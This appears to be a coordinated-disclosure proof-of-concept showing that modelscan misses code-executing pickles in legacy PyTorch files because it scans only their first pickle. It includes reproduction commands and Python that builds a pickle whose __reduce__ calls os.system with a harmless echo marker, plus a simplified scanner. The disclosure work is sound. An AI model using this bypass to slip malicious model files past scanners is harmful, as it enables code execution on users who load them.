Benign PoC: modelscan legacy-PyTorch scan-truncation bypass

Coordinated-disclosure proof-of-concept for Protect AI modelscan, submitted via huntr (Model File Vulnerability).

modelscan's scan_pytorch treats a legacy (non-zip) PyTorch file as a single pickle stream: it calls the pickle scanner with multiple_pickles=False from offset 0, so it disassembles only the first of the file's concatenated pickles (the MAGIC_NUMBER long, which contains no GLOBAL/STACK_GLOBAL opcodes) and stops. The object pickle, the fourth in the file after the magic number, protocol version and sys_info pickles, is never inspected. A malicious legacy .pt/.bin/.pth/.ckpt therefore scans clean yet runs code on torch.load(..., weights_only=False).

Both files below carry the identical benign payload:

  • evil_legacy.pt: torch.save(..., _use_new_zipfile_serialization=False) → modelscan: No issues found (the bypass)
  • evil_zip.pt: torch.save(..., _use_new_zipfile_serialization=True) → modelscan: CRITICAL posix.system (control)

Reproduce

pip install torch modelscan
modelscan -p evil_legacy.pt    # -> No issues found         (bypass)
modelscan -p evil_zip.pt       # -> CRITICAL posix.system   (same payload, caught in zip format)

The control proves modelscan detects the exact same payload when the format routes it through PickleUnsafeOpScan, but misses it in the legacy format.
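The mechanism above, as an added example that is not modelscan's or this repo's code: it rebuilds the legacy and zip layouts around the same benign payload using only the standard library (no torch), then runs a simplified scanner over both. The layout constants (MAGIC_NUMBER, PROTOCOL_VERSION, the magic / protocol / sys_info / object / storage-keys pickle order) are taken from torch.serialization's legacy writer and are an assumption of the example; SYS_INFO is a constructed stand-in for the real dict, and globals_in_pickles is a simplification of modelscan's pickle scanner, not its code. The payload pickles as a call to os.system(...) but is only ever disassembled with pickletools, never loaded.

```python
"""Added example (not modelscan's or this repo's code): legacy vs zip PyTorch
layout around one benign payload, scanned first-pickle-only vs all pickles."""
import io
import os
import pickle
import pickletools
import zipfile

# Layout constants as written by torch.serialization's legacy writer (assumption:
# copied from torch; SYS_INFO is a constructed stand-in for the real dict).
MAGIC_NUMBER = 0x1950A86A20F9469CFC6C
PROTOCOL_VERSION = 1001
SYS_INFO = {"protocol_version": PROTOCOL_VERSION, "little_endian": True}
LEGACY_PICKLE_COUNT = 5  # magic, protocol version, sys_info, object, storage keys
MARKER_CMD = "echo CELVEX-MFV-MARKER"  # harmless; this script never unpickles it
SYSTEM_GLOBAL = (os.system.__module__, "system")  # ("posix", "system") on Linux


class BenignPayload:
    """Pickles as a call to os.system(MARKER_CMD). Only ever disassembled here."""

    def __reduce__(self):
        return (os.system, (MARKER_CMD,))


def build_legacy_pt(obj):
    """Constructed legacy (non-zip) .pt: concatenated pickles, then raw storage."""
    f = io.BytesIO()
    pickle.dump(MAGIC_NUMBER, f, protocol=2)      # pickle 1: a long, no globals
    pickle.dump(PROTOCOL_VERSION, f, protocol=2)  # pickle 2
    pickle.dump(SYS_INFO, f, protocol=2)          # pickle 3
    pickle.dump(obj, f, protocol=2)               # pickle 4: the model object
    pickle.dump([], f, protocol=2)                # pickle 5: storage keys (none)
    f.write(b"\x00\x00\x80\x3f" * 4)              # constructed raw storage bytes
    return f.getvalue()


def build_zip_pt(obj):
    """Constructed zip-format .pt: the object pickle is a member named data.pkl."""
    f = io.BytesIO()
    with zipfile.ZipFile(f, "w") as zf:
        zf.writestr("model/data.pkl", pickle.dumps(obj, protocol=2))
        zf.writestr("model/version", b"3\n")
    return f.getvalue()


def globals_in_pickles(data, multiple_pickles, max_pickles=None):
    """Return (module, name) pairs named by GLOBAL/STACK_GLOBAL opcodes.

    multiple_pickles=False stops after the first STOP opcode, which is what a
    first-pickle-only legacy scan does; True continues through the following
    concatenated pickles until max_pickles, end of data, or a byte that is not
    a pickle opcode (the raw storage that follows the last legacy pickle).
    """
    stream = io.BytesIO(data)
    found, scanned = [], 0
    while stream.tell() < len(data):
        strings = []  # STACK_GLOBAL (protocol 4) takes the module/name pushed just before it
        try:
            for opcode, arg, _pos in pickletools.genops(stream):
                if opcode.name in ("UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"):
                    strings.append(arg)
                elif opcode.name == "GLOBAL":          # pickletools gives arg as "module name"
                    found.append(tuple(arg.split(" ", 1)))
                elif opcode.name == "STACK_GLOBAL":    # memo reuse via BINGET is not handled
                    found.append(tuple(strings[-2:]))
        except ValueError:
            break  # reached bytes that are not a pickle (raw storage)
        scanned += 1
        if not multiple_pickles or (max_pickles is not None and scanned >= max_pickles):
            break
    return found


def scan_legacy_pt(data, multiple_pickles):
    """Legacy layout: stop at the storage-keys pickle instead of parsing storage bytes."""
    return globals_in_pickles(data, multiple_pickles, max_pickles=LEGACY_PICKLE_COUNT)


def scan_zip_pt(data):
    """Zip layout: scan every .pkl member; the object pickle is first in data.pkl."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith(".pkl"):
                found += globals_in_pickles(zf.read(name), multiple_pickles=False)
    return found


if __name__ == "__main__":
    legacy, zipped = build_legacy_pt(BenignPayload()), build_zip_pt(BenignPayload())
    print("legacy, first pickle only:", scan_legacy_pt(legacy, False))  # []
    print("legacy, all pickles:     ", scan_legacy_pt(legacy, True))   # [SYSTEM_GLOBAL]
    print("zip, data.pkl:           ", scan_zip_pt(zipped))            # [SYSTEM_GLOBAL]
```

With multiple_pickles=False the legacy file yields no globals at all, which is the "No issues found" verdict; walking the concatenated pickles, or scanning the zip member data.pkl where the object pickle is the first and only pickle, yields posix.system. A scanner that handles the legacy layout should also cap at the storage-keys pickle rather than parse on into the raw storage bytes, which can fail (or, worse, parse spuriously) as pickle opcodes.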

Strictly benign: the payload's __reduce__ only runs os.system("echo CELVEX-MFV-MARKER > /tmp/…") β€” it writes a harmless marker string. No weaponization. Confirmed against released modelscan 0.8.8, torch 2.12.1.
